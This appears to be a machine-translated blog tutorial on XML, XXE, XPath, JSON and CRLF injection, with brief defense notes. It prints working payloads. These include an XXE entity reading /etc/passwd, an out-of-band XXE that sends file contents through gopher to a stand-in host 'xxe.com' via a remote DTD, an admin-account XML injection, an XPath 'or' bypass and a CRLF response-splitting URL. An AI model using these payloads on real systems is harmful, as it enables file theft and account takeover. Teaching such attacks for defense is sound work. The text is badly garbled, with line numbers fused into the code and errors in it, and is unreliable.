Web Security article fifth-Other injected artifice: XML injection, XPath injection, JSON injection, CRLF injection

0. Preface

It's been a while since I've been concentrating on web security for a while, but looking at the back is a bit complicated, involving more and more complex middleware, bottom-level security, vulnerability research, and security, so here's a series on web security basics and some flattering payload tips to keep it handy. is not the great God, the blog content is very basic, if someone really looks and is the Daniel, please do not spray me, welcome to correct my mistakes (limited level).

First, XML injection:

1. Essence:

XML is a kind of data organization storage data structure way, the security of XML when the user input to generate new data should only allow users to accept data, need to filter out some can change the XML tags that change the XML structure to insert new functions (such as new account information, equal to add account) of the special input, If there is no filtering, it can cause an XML injection attack.

2. Examples:

1 """2 The original organization data is as follows:3 <user role= "Guest" >4 <name>user1</name>5 <password>uesr1</password>6 <email>[email protected]</email>7 </USER>8 The data that the user should have submitted is User1, user1, [email protected]9 if the data submitted by the user isTen under Post One name = User1&passwd=user1&[email protected]</email></user><user role= "admin" >< Name>attack</name><password>attack</password><email>[email protected] A will cause a new administrator account to be generated attack - """

1 /*2 (1) have echo, direct read file3 */4<?PHP5     $xml=$GET[' XML '];6     $data=simplexml_load_string($xml);7     Print_r($data);8>9 /*Ten attack request Get A.b.c.d?xml=<?xml version= "1.0" encoding= "Utf-8"? ><! DOCTYPE XXe [<! ELEMENT name Any> <! ENTITY XXe SYSTEM "file:///etc/passwd" >]> <root><name>&xxe;</name></root> One */ A /* - (2) referencing an XML file on a remote server to read a file - */ the /*#1. xml: - <! ENTITY% a SYSTEM "file:///etc/passwd" > - <! ENTITY% B "<! ENTITY% c SYSTEM ' gopher://xxe.com%a; ' > ">%b;%c - #payload + <?xml version= "1.0" encoding= "Utf-8" > - <! DOCTYPE Root [ + <! ENTITY% remote SYSTEM "Http://192.168.106.208/1.xml" > A %remote;] > at */

1 <!--the original XML is: -2 <?XML version= "1.0" encoding= "UTF-8"?>3 <Adminuser>4 <AdminID= "1">5 <name>Admin</name>6 <Password>Admin</Passsword>7 </Admin>8 </Adminuser>9 <!--Ten For example, an attacker can modify the password section, which can be constructed as follows: One Input: A <admin></password></admin><admin Id=2><name>test</name><password >test</password></admin> - the XML file will then become: -  - the <?XML version= "1.0" encoding= "UTF-8"?> - <Adminuser> - <AdminID= "1"> - <name>Admin</name> + <Password>Admin</Passsword> - </Admin> + <AdminID= "2"> A <name>Test</name> at <Password>Test</Passsword> - </Admin> - </Adminuser> - <!-- - An administrator privilege account was added.  -  -

3. Harm:

#常见攻击手段包括:

#读取本地文件 (may contain sensitive information/etc/shadow)

#内存侵犯

#任意代码执行

#拒绝服务

4. Defense:

#对有改变XML结构的特殊输入进行过滤或者编码
#filter list = ["&", "<", ">", "'". ' "'", ""/"]
#在XML保存和展示之前都需要

Second, XPath injection:

1. Essence:

#Xpath是类似SQL的一种从XML结构中搜索节点数据的语言 (DSL), its injection of letting go is the construction of a fully executable DSL, essentially the same as SQL injection.

2. For example:

General structure//nodename[colunmname/colunmtype () = "xxxxxx" and .....
For example:
USER [Username/text () = "admin" and password/text () = "123456"]
Injection is the construction of the content within quotation marks:
For example password=> 111 "or" 2 "=" 2

3. Defense:
Defense is simple, filter special input characters can be.

Third, JSON injection:

1. Essence:

@json is also a format for transmitting data, adding a user's JSON structure as follows:

{"AddUser": [{"username": "admin1", "Password": "123456"}]}, you can inject more than one password=>123456 "},{" username ":" admin2 "," Password ":" 123456

2. Defense:

Filter keywords.

Iv. CRLF injection is also called HTTP response truncation:

1. Essence:

Also called CRLF injection attack. CR, LF corresponds to carriage return (%0d), newline (%0a) characters respectively. The HTTP header consists of a number of rows separated by the CRLF combination, each of which is a "key: value" structure. If the user enters a value part injected with the CRLF character, it is possible to change the HTTP header structure.

2, for example: Suppose the data part is XSS payload will be the Recruit AH

1 """2 (1) request-method:get3 Url:http://a.b.c.d/index.html?language=chinense4 RESPONSE:5 http/1.1 302 Moved temporarily gmt\r\n6 Date: ********7 location:http://a.b.c.d/zhcn.html8 server:******9               ******Ten (2) Request-method:get One Url:http://a.b.c.d/index.html?language=chinense%0d%0acontent-length%3a+%0d%0a%0d%0ahttp%2f1.1+200+o k%0d%0acontent-type%3a%+text%2fhtml%d%0acontent-length%3a+24%0d%0a%3chtml%3ei%e2%80%99m+hacker!%3c%2fhtml%3e  A is actually: - Chinese - content-length:0 the  - http/1.1 OK - content-type:text/html - content-length:24 +  -  +  A RESPONSE: at http/1.1 302 Moved temporarily gmt\r\n - Date: ******** - location:http://a.b.c.d/zhcn.html - content-length:0 -                - http/1.1 OK in content-type:text/html - content-length:24 to               +  - server:****** the               ****** *  $ Panax Notoginseng Modify the encoding format to prevent filtering functions from filtering out the Utf-8,gbk,unicode encoding of commonly used malicious payload symbols. - wait the  + of course, without adding a new HTTP response header, direct injection \ r \ n (CRLF) and payload A  the common PHP functions that are prone to problems + header () - Setcookie () $ session_id () $ Setrawcookie () -  - Location: the REDIRECT to a malicious address - write your own data to a cookie, Set-cookieWuyi """

3. Defense:

Limit user input of CR and LF, or correct encode of CR and LF characters before output

Web Security article fifth-Other injected artifice: XML injection, XPath injection, JSON injection, CRLF injection